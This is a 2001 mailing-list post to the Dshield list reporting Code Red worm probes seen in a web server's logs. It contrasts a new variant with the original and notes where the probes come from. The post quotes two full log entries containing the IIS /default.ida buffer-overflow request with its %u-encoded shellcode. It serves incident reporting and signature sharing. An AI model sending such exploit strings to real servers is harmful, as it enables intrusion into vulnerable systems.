[Dshield] Code Red Host Scans (and more)

John Groseclose iain at caradoc.org
Sat Aug 4 17:19:47 GMT 2001


Much as I hate to follow-up my own messages, I no longer think that 
the new worm signature is an attempt to reboot the machine - it 
appears to be (according to a guy who knows Windows FAR better than I 
- I'm a UNIX and Mac guy!) a modified version of Code Red.

I've spotted probes from all over: France, parts of Asia, Taiwan, 
Japan, and an *awful* lot of probes from speakeasy.net (my provider, 
so I'm talking to them about it.) I'm getting probes for this "new" 
version from networks that never tried to connect via the "old" 
version.

Today may get ugly, folks. It may get *really* ugly.

Beginning about five hours ago, I've detected 97 probes of the "new" variety:

dsl081-156-226.chi1.dsl.speakeasy.net - - [04/Aug/2001:10:11:41 
-0700] "GET /def
ault.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8
190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"

The old variety looks like this:

images.aopublishing.org - - [04/Aug/2001:10:05:01 -0700] "GET 
/default.ida?NNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000
3%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"

The probes appear to be increasing in frequency from all kinds of 
IPs, but I do note that a fair number of them appear to be repeat 
attempts.
-- 
John Groseclose
iain at caradoc.org




More information about the list mailing list